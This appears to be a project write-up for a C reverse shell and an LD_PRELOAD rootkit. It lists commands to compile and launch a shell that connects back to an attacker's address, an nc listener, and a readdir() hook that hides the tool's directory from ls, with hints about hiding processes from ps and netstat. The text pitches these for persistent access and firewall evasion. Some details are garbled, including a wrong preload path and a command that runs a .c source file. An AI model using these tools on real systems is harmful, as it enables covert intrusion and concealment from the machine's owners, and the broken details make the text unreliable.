Target system(victim) acts an client and sever is setup by connection initiator(attacker). This is used as a one of post-exploitation tools to gain persistent remote access to victim machine.
- This remove the requirement of victim's machine IP address and port
- May help an attacker to bypass incoming connection firewall rules.
- victim's machine
gcc rvrshell.c -o rvrshell &&
./rvrshell [IPV4 Addr] [port]
- attacker's machine:
nc -l [port]
gcc shellsrv.c -o srv &&
./shellsrv.c [port]
Now to we will be looking at concept of Function call hooking using dynamic linking(shared libraries)- Dynamic linker provides feature for development of shared libraries and debugging purposes. Such LD_PRELOAD environment viriable or /etc/ld.preload.so in linux which make loading specified library function into memory before default libraries.1
Function call hooking refers to a range of techniques used to intercept calls to pre-existing functions and wrap around them to modify the function’s behavior at runtime. 2
We will be using function call hooking to hide our executables files from /bin/ls
Here, We hooked function readdir()3 which act as C wrapper to getdents(), which is used by /bin/ls to list directories. strace /bin/ls
Instead of hiding files, we hooked readdir() function just to hide directory of name "reverseShell". We modified readdir() in such a way that when it get entry for "hidden_dir_name" it skips and hop to next entry and returns next dirent pointer.
This can be further improve by hooking more function call to hide process from ps and netstat, but here it completes the purpose of project.
> gcc -Wall -fPIC -shared libreaddir.c -ldl -D_GNU_SOURCE -o libreaddir.so
( by convention shared lib end with .so & static lib with .a )
> export LD_PRELOAD=/path/to/libreaddir.so